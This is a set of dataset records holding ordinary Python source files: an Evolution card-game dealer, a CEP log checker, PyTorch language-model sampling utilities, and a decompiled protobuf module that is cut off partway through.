+{"seq_id":"10937708","text":"from helpers import *\nfrom player_state import PlayerState\nfrom species import Species\nfrom feeding import *\nfrom traitcard import TraitCard\n\"\"\"\nA Dealer Object.\n\"\"\"\n\n\nclass Dealer(object):\n \"\"\"\n A representation of a game of Evolution containing both the state of the game,\n and the API to progress through it.\n\n Attributes:\n players: List of each players' PlayerState\n deck: List of TraitCards representing the game's deck. 
Where the beginning\n of the list is the top of the deck, and the end of the list is the bottom.\n watering_hole: Integer representing the board's number of available food tokens.\n current_player_index: Index of player_sets for the player whose turn it is.\n skipped_players: List of players who are no longer feeding in the current round.\n \"\"\"\n\n def __init__(self, player_interfaces):\n \"\"\"\n create a Dealer object\n :param player_interfaces: list of player interface\n \"\"\"\n self.players = []\n self.deck = []\n self.watering_hole = 0\n self.current_player_index = 0\n self.skipped_players = []\n\n for index, player in enumerate(player_interfaces):\n self.players.append(PlayerState(player, index + 1))\n\n def __eq__(self, other):\n \"\"\"Compares two dealer objects\"\"\"\n return all([isinstance(other, Dealer),\n len(self.players) == len(other.players),\n self.deck == other.deck,\n self.watering_hole == other.watering_hole,\n self.current_player_index == other.current_player_index,\n self.skipped_players == other.skipped_players])\n\n def run(self):\n \"\"\"\n Runs a complete instance of the Evolution game.\n \"\"\"\n self.create_deck()\n while len(self.deck) > self.min_deck_size() and self.players:\n self.skipped_players = []\n self.make_initial_species()\n self.deal_round()\n self.players_start()\n actions = self.get_player_actions()\n self.validate_actions(actions)\n self.apply_actions(actions)\n self.reduce_species_pop()\n self.move_food()\n\n def create_deck(self):\n \"\"\"\n Creates a deck of TraitCards.\n Creates 7 cards of each Trait with a value of [-3,3] except for carnivore\n where there are 17 cards created with a value of [-8,8].\n \"\"\"\n for trait in TraitCard.traits:\n num_cards = 7\n if trait == \"carnivore\":\n num_cards = 17\n self.deck.extend(TraitCard.gen_cards(num_cards, trait))\n self.deck.sort(TraitCard.compare)\n\n def make_initial_species(self):\n \"\"\"\n Gives each player without a species board one new species with a\n population of one.\n \"\"\"\n for player in self.players:\n if len(player.species) == 0:\n player.species.append(Species())\n\n def min_deck_size(self):\n \"\"\"\n Determines the lowest amount of cards the deck can have while still\n being able to give each player the appropriate number of cards at the\n start of a round.\n :return: The number of cards required to deal at the start of a round.\n \"\"\"\n num_species = 0\n for player in self.players:\n num_species += len(player.species)\n min_cards = (3 * len(self.players)) + num_species\n return min_cards\n\n def deal_round(self):\n \"\"\"\n Gives each player one card per species board it owns and three additional\n cards.\n \"\"\"\n for player in self.players:\n num_cards = 3 + len(player.species)\n self.deal(num_cards, player)\n\n def players_start(self):\n \"\"\"\n Calls start on each player with the current amount of food in the WH.\n \"\"\"\n for player in self.players:\n player.start(self.watering_hole)\n\n def get_player_actions(self):\n \"\"\"\n Gets player actions for each player using the choose method.\n :return: List-of-Action, for each player in the game.\n \"\"\"\n actions = []\n before = []\n to_remove = []\n after = map(lambda plr: plr.species, self.players)\n for player in self.players:\n after = after[1:]\n choice = player.choose(before, after)\n if choice:\n actions.append(choice)\n else:\n to_remove.append(player)\n before.append(player.species)\n for player in to_remove:\n self.remove_player(player)\n return actions\n\n def validate_actions(self, actions):\n 
\"\"\"\n Ensures that the list of actions contains valid actions for each player\n in the game. Removes any players whose actions are not valid.\n Effect: removes players from the self.players whose actions are invalid.\n :param actions: The list of Actions containing the requested Action of\n each player.\n \"\"\"\n to_remove = []\n for i in range(len(self.players)):\n if not self.players[i].is_valid_action(actions[i]):\n to_remove.append(i)\n for i in to_remove:\n self.remove_player(self.players[i])\n remaining_actions = []\n for index, action in enumerate(actions):\n if index not in to_remove:\n remaining_actions.append(action)\n\n def remove_player(self, player):\n \"\"\"\n Removes the given player from the game permenantly.\n :param player: the player to remove from the game.\n \"\"\"\n self.players.remove(player)\n if self.current_player_index == len(self.players):\n self.current_player_index = 0\n\n def reduce_species_pop(self):\n \"\"\"\n Reduces each players species population to its food amount at the end of\n a round.\n \"\"\"\n for player in self.players:\n for species in player.species:\n to_kill = species.population - species.food\n for _ in range(to_kill):\n self.kill(player, species)\n\n def move_food(self):\n \"\"\"\n Moves all food tokens from each players species to their food_bags.\n \"\"\"\n for player in self.players:\n player.move_food_to_bag()\n\n def apply_actions(self, actions):\n \"\"\"\n Applies the given list of Actions and feeds the players' species until\n they cannot feed anymore.\n :param actions: List-of Action where action i corresponds with the action\n of the i'th player.\n \"\"\"\n self.reveal_cards(actions)\n self.trigger_auto_traits()\n\n for player, action in zip(self.players, actions):\n player.apply_action(action)\n\n self.move_fat_food()\n while self.watering_hole > 0 and len(self.players) != len(self.skipped_players):\n self.feed1()\n\n def reveal_cards(self, actions):\n \"\"\"\n Adds all food points from cards allocated for food in the given actions to\n the waterin' hole.\n :param actions: List of Actions to get the food card selections from.\n \"\"\"\n for action, player in zip(actions, self.players):\n food_card = player.hand[action.food_card]\n self.watering_hole += food_card.food_points\n food_card.used = True\n\n self.watering_hole = max(self.watering_hole, 0)\n\n def trigger_auto_traits(self):\n \"\"\"\n Automatically updates the population or body size of a species with the\n Fertile or Long Neck traits\n \"\"\"\n for player in self.players:\n player.trigger_fertile()\n for player in self.players:\n self.watering_hole = player.trigger_long_neck(self.watering_hole)\n\n def move_fat_food(self):\n \"\"\"\n Moves fat-food to normal food\n \"\"\"\n for player in self.players:\n player.trigger_fat_food()\n\n def feed1(self):\n \"\"\"\n Executes one step in the feeding cycle and updates the game state accordingly\n Effect: Feeds one species of the current player, potentially triggerring\n other feedings.\n \"\"\"\n current_player = self.players[self.current_player_index]\n if self.watering_hole <= 0:\n return\n\n if self.current_player_index in self.skipped_players or \\\n not current_player.can_feed(self.opponents()):\n self.skip_cur_player()\n self.rotate_players()\n return\n\n feeding = self.next_feed()\n\n if feeding and self.validate_feeding(feeding):\n feeding.apply(self)\n self.rotate_players()\n else:\n self.remove_player(current_player)\n\n def validate_feeding(self, feeding):\n \"\"\"\n Ensures that the given Feeding is valid to 
apply to the current player.\n :param feeding: The Feeding to validate.\n :return: True if it is a valid Feeding, else False.\n \"\"\"\n return feeding.validate(self)\n\n def rotate_players(self):\n \"\"\"\n Increments this dealer's current player index to the next player in the ordering.\n \"\"\"\n self.current_player_index = (self.current_player_index + 1) % len(self.players)\n\n def kill(self, player, species):\n \"\"\"\n Removes one population token from the given species. If that species\n goes extinct 2 cards are dealt to the player.\n :param player: The player whose species is being killed.\n :param species: The species who is being killed.\n \"\"\"\n extinct = player.kill(species)\n if extinct:\n self.deal(2, player)\n\n def skip_cur_player(self):\n \"\"\"\n Removes the current player from the player feeding order.\n \"\"\"\n if self.current_player_index not in self.skipped_players:\n self.skipped_players.append(self.current_player_index)\n\n def next_feed(self):\n \"\"\"\n Gets the next species to feed for the current player.\n :return: a Feeding, either decided automatically if only one choice\n is present, or by asking the current player\n \"\"\"\n auto_eat = self.auto_eat()\n if auto_eat is None:\n current_player = self.players[self.current_player_index]\n opponents = map(lambda plr: plr.public_state(), self.opponents())\n next_feeding = current_player.next_feeding(self.watering_hole, opponents)\n if next_feeding:\n return next_feeding\n else:\n self.remove_player(current_player)\n return False\n else:\n return auto_eat\n\n def auto_eat(self):\n \"\"\"\n Feeds a species when there is only one herbivore or one carnivore with\n one attackable species.\n :return: A Feeding, or None if a feeding choice cannot be automatic.\n \"\"\"\n cur_player_species = self.players[self.current_player_index].species\n\n hungry_herbivores = [species for species in cur_player_species\n if \"carnivore\" not in species.traits and species.can_eat()]\n hungry_carnivores = [species for species in cur_player_species\n if \"carnivore\" in species.traits and species.can_eat()]\n\n if len(hungry_herbivores) == 1 and len(hungry_carnivores) == 0:\n eater = hungry_herbivores[0]\n return self.herbivore_autoeat(eater, cur_player_species)\n\n if len(hungry_carnivores) == 1 and len(hungry_herbivores) == 0:\n eater = hungry_carnivores[0]\n return self.carnivore_autoeat(eater, cur_player_species)\n return None\n\n def herbivore_autoeat(self, eater, cur_player_species):\n \"\"\"\n Constructs a Feeding for the given eater.\n :param eater: The herbivore species to feed.\n :param cur_player_species: List of the current player's species.\n eater must be an element of this list.\n \"\"\"\n herbivore_index = cur_player_species.index(eater)\n if \"fat-tissue\" in eater.traits and eater.fat_storage < eater.body:\n max_food = eater.body - eater.fat_storage\n food_requested = min(self.watering_hole, max_food)\n return FatTissueFeeding(herbivore_index, food_requested)\n else:\n return HerbivoreFeeding(herbivore_index)\n\n def carnivore_autoeat(self, eater, cur_player_species):\n \"\"\"\n Constructs a Feeding for the given eater.\n :param eater: The carnivore species to feed.\n :param cur_player_species: List of the current player's species.\n eater must be an element of this list.\n \"\"\"\n carnivore_index = cur_player_species.index(eater)\n targets = carnivore_targets(eater, self.opponents())\n\n if len(targets) == 1:\n target_player = next(player for player in self.players\n if targets[0] in player.species)\n defender_index 
= target_player.species.index(targets[0])\n target_index = self.opponents().index(target_player)\n return CarnivoreFeeding(carnivore_index, target_index, defender_index)\n\n def feed_scavengers(self):\n \"\"\"\n Gives one food token to all species with the scavenger trait.\n \"\"\"\n for player in self.players:\n self.watering_hole = player.trigger_scavenging(self.watering_hole)\n\n def feed(self, player, species):\n \"\"\"\n Updates the watering hole after a players feeding has been applied.\n :param player: The player currently feeding.\n :param species: The species the player is feeding.\n \"\"\"\n self.watering_hole = player.feed(species, self.watering_hole)\n\n def deal(self, num_cards, player):\n \"\"\"\n Gives num_cards to the player from the deck.\n :param num_cards: The number of cards to deal to the player.\n :param player: The player receiving the cards.\n \"\"\"\n to_deal = min(num_cards, len(self.deck))\n for i in range(to_deal):\n card = self.deck.pop(0)\n player.hand.append(card)\n\n def check_for_hungries(self, list_of_species):\n \"\"\"\n Finds the hungry species in a players list of species\n :param list_of_species: The players list of species.\n :return: List of hungry species.\n \"\"\"\n hungries = []\n for species in list_of_species:\n if species.can_eat():\n hungries.append(species)\n return hungries\n\n def opponents(self):\n \"\"\"\n get the player states of all non-current player\n :return: a list of player states\n \"\"\"\n opponents = [plr for plr in self.players]\n opponents.pop(self.current_player_index)\n return opponents\n\n def get_scores(self):\n \"\"\"\n Creates a List of Lists of player id to the associated player's score.\n Score is calculated by the sum of the food in the food bag, the sum of the\n population of each of that player's species, and the sum of the number\n of trait cards on each of their species.\n :return: A dictionary [[id, score], ...] 
for each player left in the game.\n \"\"\"\n scores = []\n for player in self.players:\n score = player.food_bag\n for species in player.species:\n score += species.population\n score += len(species.traits)\n scores.append([player.name, score])\n return scores\n","sub_path":"14/evolution/dealer.py","file_name":"dealer.py","file_ext":"py","file_size_in_byte":15638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"568589337","text":"class Ceplog:\n CEPLOG_FILE = \"ceplog-demo.csv\"\n\n\n def __init__(self):\n pass\n\n def open_ceplog(self):\n with open(f'data/{Ceplog.CEPLOG_FILE}', \"r\") as file:\n for line in file:\n current_line = line.split(\";\")\n print(current_line)\n\n def test_logs(self, cepcid):\n with open(f'data/{Ceplog.CEPLOG_FILE}', \"r\") as file:\n file.readline()\n for line in file:\n current_line = line.split(\";\")\n cep = int(current_line[0])\n key = current_line[1]\n log = current_line[6]\n\n is_cep_right = 'Right' if cepcid.find_log(cep, key, log) else 'Wrong'\n\n print(f'{cep} is {is_cep_right}')\n\n def show_logs_by_key(self, key):\n with open(f'data/{Ceplog.CEPLOG_FILE}', \"r\") as file:\n file.readline()\n for line in file:\n current_line = line.split(\";\")\n if(key == current_line[1]):\n print(current_line[0])\n","sub_path":"ceplog.py","file_name":"ceplog.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"133772739","text":"from model.ops import mask_lengths\nimport re\nimport torch\nimport numpy as np\n\nfrom copy import deepcopy\n\ndef top_k_logits(logits, k):\n if k == 0:\n # no truncation\n return logits\n else:\n values, _ = torch.topk(logits, k=k)\n min_values = values[:, -1, None]\n return torch.where(\n logits < min_values,\n torch.ones_like(logits, dtype=logits.dtype) * -1e4,\n logits,\n )\n\n\ndef top_p_logits(logits, p):\n \"\"\"Nucleus sampling\"\"\"\n batch = logits.size(0)\n sorted_logits, _ = torch.sort(logits, descending=True, dim=-1)\n cumulative_probs = torch.cumsum(torch.softmax(sorted_logits, dim=-1), dim=-1)\n a = torch.arange(0,batch).to(logits.device)\n b = torch.max(torch.sum(cumulative_probs <= p, dim=-1) - 1, torch.Tensor([0]).long().to(logits.device))\n min_values = sorted_logits[a,b].to(logits.device)\n return torch.where(\n logits < min_values[:,None],\n torch.ones_like(logits) * -1e4,\n logits,\n )\n\n\ndef gathered_input(indexed):\n device = indexed.device\n # print(indexed.size())\n bs, l = indexed.size()\n lens = torch.LongTensor([l + 1] * bs).to(device)\n indexed = torch.cat([indexed, torch.LongTensor([0] * bs)[:, None].to(device)], 1)\n return bs, l, (indexed,lens)\n\n\ndef divided_input(indexed):\n device = indexed[0].device\n title, content, title_len, context_len = indexed\n bs, tl = title.size()\n content = content[:,-1:]\n _, cl = content.size()\n cls = torch.LongTensor([2] * bs).to(device)\n cind = torch.cat([content, torch.LongTensor([0] * bs)[:, None].to(device)], 1)\n return bs, cl, (title, cind, title_len, cls)\n\n\ndef structured_input(indexed):\n device = indexed[0].device\n txt, struct = indexed\n bs, tl = txt.size()\n l = torch.LongTensor([tl + 1] * bs).to(device)\n txt = torch.cat([txt, torch.LongTensor([0] * bs)[:, None].to(device)], 1)\n struct = torch.cat([struct, torch.LongTensor([0] * bs)[:, None].to(device)], 1)\n return bs, tl, (txt, struct, l)\n\n\ndef get_mem(model,inp):\n istuple = True if isinstance(inp, tuple) else False\n with torch.no_grad():\n if 
istuple:\n title, context, title_len, context_len = inp\n context = context[:,:-1]\n context_len = torch.clamp_min(context_len - 1,0)\n _, mem = model.compute_hidden((title,context,title_len,context_len,None))\n else:\n bs, l = inp.size()\n lens = torch.LongTensor([l - 1] * bs).to(inp.device)\n _, mem = model.compute_hidden((inp[:,:-1],None,lens))\n\n return mem, inp\n\n\ndef sample(model, lengths, inp, top_w, temparature, experimental_loss, sampling_mode=0):\n top_whatever = top_k_logits if isinstance(top_w, int) else top_p_logits\n probs = None\n istuple = True if isinstance(inp, tuple) else False\n mem, inp = get_mem(model, inp)\n res = torch.LongTensor([]).to(inp.device)\n cnt = 0\n for _ in range(lengths):\n cnt+=1\n with torch.no_grad():\n if istuple:\n bs, l, inp = divided_input(inp)\n else:\n bs, l, inp = gathered_input(inp[:,-1:])\n if experimental_loss:\n logits, new_mem = model.sampling(inp + (mem, sampling_mode, top_w, temparature))\n else:\n logits, new_mem = model(inp + (None, mem))\n # mem = [torch.cat([mem[i], new_mem[i].to(mem[i].dtype)[:,:-1]],1) for i in range(len(mem))]\n mem = tuple([new_mem[i][...,:-1,:] for i in range(len(mem))])\n logits = top_whatever(logits, top_w)\n logits = logits.view(bs,l,-1)\n logits = logits[:,-1,:] / temparature\n saved_logits = logits\n sampled = torch.multinomial(torch.softmax(logits,-1),1)\n res = torch.cat([res,sampled],1)\n temp_probs = torch.softmax(saved_logits, 1)\n probs = torch.cat([probs,temp_probs[torch.arange(len(sampled)),sampled.squeeze(1)][:,None]],1) \\\n if probs is not None else temp_probs[torch.arange(len(sampled)),sampled.squeeze(1)][:,None]\n if istuple:\n title, cind, tls, cls = inp\n cind = sampled\n inp = (title, cind,tls,cls)\n else:\n inp = sampled\n # if sampled == torch.LongTensor([[0]]).to('cuda'):\n # cnt +=1\n # if cnt ==2:\n # break\n if istuple:\n return res.tolist(), probs.tolist()\n else:\n return res.tolist(), probs.tolist()\n\n\ndef sample_char(model, lengths, inp, top_w, temparature, experimental_loss, encoder, sampling_mode=0):\n top_whatever = top_k_logits if isinstance(top_w, int) else top_p_logits\n\n vocab_size=encoder.vocab_size\n\n vocab_length=[ count_syllable(encoder.decode([i]).strip()) for i in range(vocab_size-1) ]\n vocab_length.append(0)\n vocab_length=torch.LongTensor(vocab_length).to(next(model.parameters()).device)\n\n sorted_garbage=vocab_length==0\n sample_k=3\n enter_index=0\n sorted_garbage[enter_index]=False\n\n # print(sorted_garbage)\n enter = torch.LongTensor([[enter_index]]).to(next(model.parameters()).device)\n\n def test_conj_end(model,inp,mem):\n\n if istuple:\n bs, l, inp = divided_input(inp[:, -1:])\n else:\n bs, l, inp = gathered_input(inp[:, -1:])\n\n if experimental_loss:\n logits, new_mem = model.sampling(inp + (mem, sampling_mode, top_w, temparature))\n else:\n logits, new_mem = model(inp + (None, mem))\n\n # print(logits[:,0])\n logits[:, sorted_garbage] = -1e3\n # print(logits[:,0])\n logits = top_whatever(logits, k=top_w)\n _, top_indexes=torch.topk(logits,sample_k,-1)\n\n res = set([enter_index]).issubset(set(top_indexes[0].tolist()))\n # if res:\n # print(top_indexes)\n return res\n\n istuple = True if isinstance(inp, tuple) else False\n token_length_holder = []\n test_batch=inp\n final_result=[]\n\n for batch in test_batch:\n inp=batch.view(1,-1)\n # inp = torch.cat([inp, enter], -1)\n res = inp\n text_idx=inp.tolist()[0]\n # text_idx=rollback_idx(text_idx,inv_dic)\n text=encoder.decode(text_idx)\n\n original_length = len(text.replace(\" \", \"\"))\n 
token_length=[]\n current_length=original_length\n mem, _ = get_mem(model, inp)\n\n for i, cll in enumerate(lengths):\n\n object_length=original_length+sum(lengths[:i+1])\n\n # copy variable for roll-back condition\n init_res = deepcopy(res)\n init_inp = deepcopy(inp)\n\n while current_length < object_length:\n # print(current_length,object_length)\n with torch.no_grad():\n if istuple:\n bs, l, inp = divided_input(inp[:, -1:])\n else:\n bs, l, inp = gathered_input(inp[:, -1:])\n if experimental_loss:\n logits, new_mem = model.sampling(inp + (mem, sampling_mode, top_w, temparature))\n else:\n logits, new_mem = model(inp + (None, mem))\n\n logits = logits.view(bs, l, -1)\n\n logits = logits[:, -1, :] / temparature\n\n logits=remove_over_length(logits,vocab_length,object_length-current_length)\n\n # logits[:,sorted_garbage]=-1e4\n logits[:,enter_index]=-1e4\n logits[:,12]=-1e4\n\n logits = top_k_logits(logits, k=top_w)\n\n sampled = torch.multinomial(torch.softmax(logits, -1), 1)\n\n pas = encoder.decode(sampled[0].tolist())\n inp = sampled\n mem = tuple([new_mem[i][..., :-1, :] for i in range(len(mem))])\n # mem = [torch.cat([mem[i], new_mem[i][:, :-1]], 1) for i in range(len(mem))]\n\n # test if must roll-back to initial step of one line.\n if current_length+count_syllable(pas.strip())==object_length-1 or (current_length+count_syllable(pas.strip())==object_length \\\n and not test_conj_end(model,inp,mem)):\n\n # roll back variable to initial state\n mem, _ = get_mem(model,init_inp)\n res = deepcopy(init_res)\n inp = deepcopy(init_inp)\n current_length = original_length + sum(lengths[:i])\n else:\n current_length += vocab_length[sampled[0].tolist()[0]].item()\n # current_length += count_syllable(pas.strip())\n res=torch.cat([res,sampled],1)\n # pas = pas.replace(\" \", \"\")\n # pas = re.sub(r'.', '\\n', pas)\n\n # print(current_length)\n # print(pas)\n # print(count_syllable(pas.strip()))\n # add mem to enter latent space\n # print(pas)\n res=torch.cat([res,enter],-1)\n inp=res\n mem, _ = get_mem(model, inp)\n\n token_length_holder.append(token_length)\n final_result.extend(res.tolist())\n if istuple:\n return inp[1].tolist()\n else:\n return res.tolist()\n\n\ndef block_words(generated, ngram):\n target = ' '.join(map(str,generated[-ngram+1:]))\n temp = ' '.join(map(str, generated))\n blocked = re.findall('(?<={} )\\d+'.format(target), temp)\n return [int(i) for i in blocked]\n#\n# def index_text(encoder, text, dic):\n# indexed = encoder.encode(text)\n# indexed = convert_idx_list(indexed, dic)\n# indexed = torch.Tensor(indexed).long()[None]\n# return indexed\n\n\ndef beam_sample(model, lengths, inp, beam_size, temparature, experimental_loss, sampling_mode=0, block_ngram=4):\n # def block(logits, res, ngram=4):\n # \"\"\"\n # :param logits: Tensor [batch, beam, vocab_size]\n # :param res: Tensor [batch, beam, len]\n # :param ngram: int\n # :return:\n # \"\"\"\n # for batch, batch_logit in zip(res, logits):\n # for beam, logit in zip(batch, batch_logit):\n # generated = list(beam.to('cpu').numpy())\n # blocked = block_words(generated,ngram)\n # logit[blocked] = -6e4\n # return logits\n\n def beam_start(logits, probs, mem, res):\n s = mem[0].size()[1:]\n logits = logits[:, -1, :] / temparature\n p, i = torch.topk(torch.log_softmax(logits, -1), beam_size, -1) #[batch, beam_size]\n probs = probs + p\n res = torch.cat([res[:,None].repeat(1,beam_size,1), i[...,None]],2) #[batch, beam, l]\n return probs, i.view(-1)[:,None], [i[:,None].repeat(1,beam_size,1,1).view((-1,)+s) for i in mem], res\n\n def 
beam_continue(logits, probs, mem, res):\n logits = logits[:, -1, :] / temparature\n logits = logits.view(bs, beam_size, -1)\n # logits = block(logits,res,block_ngram)\n p, i = torch.topk(torch.log_softmax(logits, -1), beam_size, -1) # [batch_size, beam_size, beam_size]\n probs = probs.unsqueeze(-1) + p\n new_probs = probs.view(bs, -1)\n probs, ni = new_probs.topk(beam_size, -1)\n sampled = i.view(bs, -1).gather(1, ni) #[batch, beam]\n group = ni // beam_size\n ind = torch.arange(bs)[:, None], group\n res = res[ind]\n res = torch.cat([res, sampled[..., None]], 2)\n lh = mem[0].size()[1:]\n reshaped_mem = [i.view((bs,beam_size) + lh) for i in mem]\n mem = [i[ind].view((-1,)+lh) for i in reshaped_mem]\n return probs, sampled.view(-1)[:,None], mem, res\n\n def finalize(probs, res):\n _, ind = probs.topk(1,-1)\n return res[torch.arange(bs),ind.squeeze(-1)]\n\n istuple = True if isinstance(inp, tuple) else False\n mem, inp = get_mem(model, inp)\n bs = inp.size(0)\n res = inp\n cnt = 0\n probs = torch.zeros((inp.size(0),beam_size), dtype=inp.dtype,device=inp.device)\n for _ in range(lengths):\n cnt+=1\n with torch.no_grad():\n if istuple:\n ts, l, inp = divided_input(inp)\n else:\n ts, l, inp = gathered_input(inp[:,-1:])\n if experimental_loss:\n logits, new_mem = model.sampling(inp + (mem, sampling_mode, beam_size, temparature))\n else:\n logits, new_mem = model(inp + (None, mem))\n mem = [torch.cat([mem[i], new_mem[i].to(mem[i].dtype)[:,:-1]],1) for i in range(len(mem))]\n logits = logits.view(ts,l,-1)\n if cnt ==1:\n probs, sampled, mem, res = beam_start(logits,probs,mem, res)\n else:\n probs, sampled, mem, res = beam_continue(logits, probs, mem, res)\n if istuple:\n title, cind, tls, cls = inp\n cind = sampled\n inp = (title, cind,tls,cls)\n else:\n inp = sampled\n\n res = finalize(probs, res)\n if istuple:\n return res.tolist(), _\n else:\n return res.tolist(), _\n\n\ndef compute_prob(encoder_path, model, texts, experimental_loss):\n enc = get_encoder(encoder_path)\n texts = index_text(enc,texts,experimental_loss).to(next(model.parameters()).device)\n probs = []\n with torch.no_grad():\n for i in range(len(texts[0]) - 1):\n batch_text = texts[:, :i+1]\n target_word = texts[:, i+1]\n lens = torch.Tensor([i + 2]).long().to(batch_text.device)\n inp_mask = mask_lengths(lens, reverse=True).byte().to(batch_text.device)\n if experimental_loss:\n logits = model.sampling(torch.cat([batch_text, torch.Tensor([0])[:, None].long().to(batch_text.device)], 1),\n None, inp_mask, True)\n else:\n logits = model(torch.cat([batch_text, torch.Tensor([0])[:, None].long().to(batch_text.device)], 1), None, inp_mask,\n None)\n logits = logits[0] # [vocab_size]\n prob = torch.softmax(logits,0)\n probs.append(prob[target_word[0]].item())\n print(probs)\n\n\ndef sample_hook(model, lengths, inp, top_k, top_p, temparature, experimental_loss, hard_sample, is_hard,\n line_idx, check_line, add_indices):\n probs = None\n istuple = True if isinstance(inp, tuple) else False\n line_num = torch.sum(inp ==0)\n for _ in range(lengths):\n with torch.no_grad():\n if istuple:\n bs, l, inp = divided_input(inp)\n else:\n bs, l, inp = gathered_input(inp)\n if experimental_loss:\n logits, __ = model.sampling(inp + (None, is_hard, hard_sample))\n else:\n logits, __ = model(inp + (None, None))\n logits = logits.view(bs,l,-1)\n logits = logits[:,-1,:] / temparature\n saved_logits = logits\n logits = top_k_logits(logits, k=top_k)\n # logits = top_p_logits(logits, p=top_p)\n sampled = torch.multinomial(torch.softmax(logits,-1),1)\n if sampled 
== line_idx:\n line_num+=1\n if not line_num % check_line and line_num // check_line >0:\n sampled = torch.cat([sampled, add_indices],1)\n # print(_, sampled.size())\n # temp_probs = torch.softmax(saved_logits, 1)\n # probs = torch.cat([probs,temp_probs[torch.arange(len(sampled)),sampled.squeeze(1)][:,None]],1) \\\n # if probs is not None else temp_probs[torch.arange(len(sampled)),sampled.squeeze(1)][:,None]\n if istuple:\n title, cind, tls, cls = inp\n cind = torch.cat([cind[:,:-1], sampled], -1)\n inp = (title, cind, tls, cls)\n else:\n indexed,lens = inp\n inp = torch.cat([indexed[:,:-1], sampled], -1)\n if istuple:\n return inp[1].tolist(), _\n else:\n return inp.tolist(), _\n\ndef remove_over_length(logits,vocab_length_tensor,length):\n return torch.where(\n vocab_length_tensor > length,\n torch.ones_like(logits, dtype=logits.dtype) * -1e4,\n logits,\n )\n\ndef english_syllable_count(word):\n return len(\n re.findall('(?!e$)[aeiouy]+', word, re.I) +\n re.findall('^[^aeiouy]*e$', word, re.I)\n )\n\n\n\n\ndef count_syllable(word):\n cnt=0\n # print(bool(re.search(\"[ㄱ-ㅎ|ㅏ-ㅣ|가-힣]\", word)))\n # print(word)\n # print(bool(re.search(\"[ㄱ-ㅎㅏ-ㅣ가-힣]\", word)))\n if bool(re.search(\"[ㄱ-ㅎㅏ-ㅣ가-힣]\", word)):\n for i,w in enumerate(word):\n if bool(re.search(\"[ㄱ-ㅎㅏ-ㅣ가-힣]\",w)):\n cnt+=1\n else:\n cnt = english_syllable_count(word)\n # print(cnt)\n return cnt\n\n\ndef structured_sample(model, lengths, inp, top_w, temparature, experimental_loss, sampling_mode=0):\n model.eval()\n top_whatever = top_k_logits if isinstance(top_w, int) else top_p_logits\n cnt = 0\n gen_txt, gen_st = inp\n for _ in range(lengths):\n cnt+=1\n with torch.no_grad():\n inp = gen_txt, gen_st\n bs, l, inp = structured_input(inp)\n if experimental_loss:\n logits, target_st, new_txt_mem, new_st_mem = model.sampling(inp + (None, None, sampling_mode, top_w, temparature))\n else:\n logits, new_mem = model(inp + (None, None))\n # txt_mem = [torch.cat([txt_mem[i], new_txt_mem[i].to(txt_mem[i].dtype)[:,:-1]],1) for i in range(len(txt_mem))]\n # st_mem = [torch.cat([st_mem[i], new_st_mem[i].to(st_mem[i].dtype)[:,:-1]],1) for i in range(len(st_mem))]\n logits = top_whatever(logits, top_w)\n logits = logits.view(bs,l,-1)\n logits = logits[:,-1,:] / temparature\n sampled = torch.multinomial(torch.softmax(logits,-1),1)\n\n target_st = target_st.view(bs,l,-1)\n target_st = target_st[:,-1] / temparature\n sampled_st = torch.multinomial(torch.softmax(target_st.to(torch.float32),-1),1)\n\n gen_txt = torch.cat([gen_txt,sampled],1)\n gen_st = torch.cat([gen_st,sampled_st],1)\n return gen_txt.tolist(), gen_st.tolist()\n","sub_path":"util/sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":18251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"375185358","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/svpino/dev/tensorflow-object-detection-sagemaker/todl/tensorflow-object-detection/research/object_detection/protos/matcher_pb2.py\n# Compiled at: 2020-04-05 21:16:38\n# Size of source mod 2**32: 3868 bytes\nfrom google.protobuf import descriptor as _descriptor\nfrom google.protobuf import message as _message\nfrom google.protobuf import reflection as _reflection\nfrom google.protobuf import symbol_database as _symbol_database\n_sym_db = _symbol_database.Default()\nfrom object_detection.protos import argmax_matcher_pb2 as object__detection_dot_protos_dot_argmax__matcher__pb2\nfrom object_detection.protos import bipartite_matcher_pb2 as 
object__detection_dot_protos_dot_bipartite__matcher__pb2\nDESCRIPTOR = _descriptor.FileDescriptor(name='object_detection/protos/matcher.proto',\n package='object_detection.protos',\n syntax='proto2',\n serialized_options=None,\n serialized_pb=b'\\n%object_detection/protos/matcher.proto\\x12\\x17object_detection.protos\\x1a,object_detection/protos/argmax_matcher.proto\\x1a/object_detection/protos/bipartite_matcher.proto\"\\xa4\\x01\\n\\x07Matcher\\x12@\\n\\x0eargmax_matcher\\x18\\x01 \\x01(\\x0b2&.object_detection.protos.ArgMaxMatcherH\\x00\\x12F\\n\\x11bipartite_matcher\\x18\\x02 \\x01(\\x0b2).object_detection.protos.BipartiteMatcherH\\x00B\\x0f\\n\\rmatcher_oneof',\n dependencies=[\n object__detection_dot_protos_dot_argmax__matcher__pb2.DESCRIPTOR, object__detection_dot_protos_dot_bipartite__matcher__pb2.DESCRIPTOR])\n_MATCHER = _descriptor.Descriptor(name='Matcher',\n full_name='object_detection.protos.Matcher',\n filename=None,\n file=DESCRIPTOR,\n containing_type=None,\n fields=[\n _descriptor.FieldDescriptor(name='argmax_matcher',\n full_name='object_detection.protos.Matcher.argmax_matcher',\n index=0,\n number=1,\n type=11,\n cpp_type=10,\n label=1,\n has_default_value=False,\n default_value=None,\n message_type=None,\n enum_type=None,\n containing_type=None,\n is_extension=False,\n extension_scope=None,\n serialized_options=None,\n file=DESCRIPTOR),\n _descriptor.FieldDescriptor(name='bipartite_matcher',\n full_name='object_detection.protos.Matcher.bipartite_matcher',\n index=1,\n number=2,\n type=11,\n cpp_type=10,\n label=1,\n has_default_value=False,\n default_value=None,\n message_type=None,\n enum_type=None,\n containing_type=None,\n is_extension=False,\n extension_scope=None,\n serialized_options=None,\n file=DESCRIPTOR)],\n extensions=[],\n nested_types=[],\n enum_types=[],\n serialized_options=None,\n is_extendable=False,\n syntax='proto2',\n extension_ranges=[],\n oneofs=[\n _descriptor.OneofDescriptor(name='matcher_oneof',\n 